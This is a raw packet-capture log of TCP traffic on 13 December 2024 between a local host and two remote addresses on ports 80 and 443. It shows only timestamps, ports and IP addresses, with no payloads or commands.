                                                                Dec 13, 2024 17:48:14.491677999 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.491825104 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.491893053 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.491893053 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.493710041 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.493798971 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.494445086 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.494548082 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.494570017 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.494638920 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.498624086 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.498702049 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.498821020 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.498919010 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.502846003 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.502954006 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.502971888 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.503015041 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.506797075 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.507021904 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.507074118 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.507074118 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.510672092 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.510786057 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.510818958 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.510818958 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.514436007 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.514520884 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.514573097 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.514573097 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.518075943 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.518399954 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.518419027 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.518493891 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.521682978 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.521750927 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.521759987 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.521799088 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.525296926 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.525363922 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.525409937 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.525639057 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.528899908 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.528944969 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.528966904 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.529000998 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.532524109 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.532536030 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.532582998 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.532582998 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.536211967 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.536302090 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.537089109 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.537089109 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.539711952 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.539817095 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.539820910 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.540282011 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.543282986 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.543339968 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.543368101 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.543469906 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.546896935 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.547012091 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.547058105 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.547058105 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.550463915 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.550517082 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.550527096 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.550580025 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.554137945 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.554198027 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.554250002 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.554250956 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.557682991 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.557756901 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.557785988 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.557823896 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.561384916 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.561434031 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.561513901 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.561513901 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.563721895 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:15.856728077 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:19.275276899 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:19.395513058 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:19.395663977 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:19.396975994 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:19.516912937 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.505322933 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.505343914 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.505363941 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.505378008 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.505393982 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.505407095 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.505419970 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.505424976 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.505460024 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.505460024 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.505600929 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.505614042 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.505625963 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.505651951 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.505651951 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.505748034 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.507419109 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.753860950 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.753922939 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.753926992 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.754024029 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.757769108 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.757873058 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.757914066 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.757914066 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.766491890 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.766580105 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.766586065 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.766761065 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.774728060 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.774791002 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.774832010 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.774832010 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.783133984 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.783204079 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.783340931 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.784694910 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.791543961 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.791619062 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.791630030 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.791812897 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.799957037 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.800043106 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.800060987 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.800097942 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.808424950 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.808485031 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.808617115 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.809242964 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.816853046 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.816920996 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.816946983 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.816994905 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.825270891 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.825402975 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.825428963 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.825443983 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.873980999 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.874166012 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.878309011 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.878351927 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.878407955 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.878407955 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.884509087 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.884604931 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.884660959 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.884701967 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.892956972 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.893035889 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.893059015 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.893414974 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.897514105 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.897665977 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.897737980 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.897872925 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.905944109 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.906056881 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.910101891 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.910177946 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.910303116 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.910361052 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.918556929 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.918582916 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.918631077 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.918631077 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.926984072 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.927102089 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.927124023 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.927253962 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.935437918 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.935478926 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.935497999 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.935564995 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.943871021 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.943943977 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.944042921 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.944094896 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.952254057 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.952325106 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.952348948 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.952416897 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.960726976 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.960819006 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.960824013 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.960874081 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.969152927 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.969271898 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.969319105 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.969319105 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.977550030 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.977597952 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.977627993 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.977664948 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.994189978 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.994262934 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.994314909 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.994513988 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.998435020 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.998545885 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:20.998550892 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:20.998871088 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.000564098 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.000642061 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.000664949 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.000690937 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.006000042 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.006170988 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.006213903 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.006213903 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.008984089 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.009115934 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.009160995 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.009160995 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.014461040 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.014583111 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.014588118 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.014646053 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.017433882 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.017510891 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.017530918 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.017883062 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.021508932 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.021579981 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.021615982 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.021661997 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.025597095 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.025674105 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.025695086 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.025753975 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.029594898 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.029623985 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.029676914 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.029676914 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.084219933 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.084279060 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.084351063 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.084351063 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.086055040 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.086174965 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.086193085 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.086247921 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.089978933 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.090039015 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.090044975 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.090106010 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.093781948 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.093806982 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.093931913 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.097662926 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.097743034 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.097786903 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.097841024 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.101288080 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.101372957 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.101382971 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.101454020 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.105128050 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.105238914 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.105252981 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.105319977 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.109015942 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.109085083 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.109095097 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.109189987 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.112726927 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.112799883 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.112838030 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.112948895 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.116530895 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.116669893 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.116692066 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.116744041 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.120309114 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.120369911 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.120423079 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.120486021 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.124185085 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.124274015 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.124680042 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.124735117 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.127013922 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.127060890 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.127151966 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.127206087 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.130105019 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.130224943 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.130249977 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.130295038 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.135284901 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.135353088 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.135426998 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.135562897 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.135581970 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.135646105 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.135780096 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.135827065 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.138220072 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.138396025 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.138441086 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.138441086 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.141040087 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.141144991 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.141184092 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.141295910 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.143445969 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.143460989 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.143506050 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.143506050 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.145922899 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.145962000 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.146111965 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.146152020 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.148456097 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.148516893 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.148624897 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.148704052 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.148818970 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.150650978 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.150671959 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.150739908 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.152873039 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.152941942 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.152962923 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.153007030 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.155327082 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.155404091 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.155426979 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.155508041 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.157663107 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.157708883 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:21.157728910 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:21.157768965 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:25.495352983 CET804916723.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:25.495690107 CET4916780192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:26.849154949 CET49168443192.168.2.22170.82.173.30
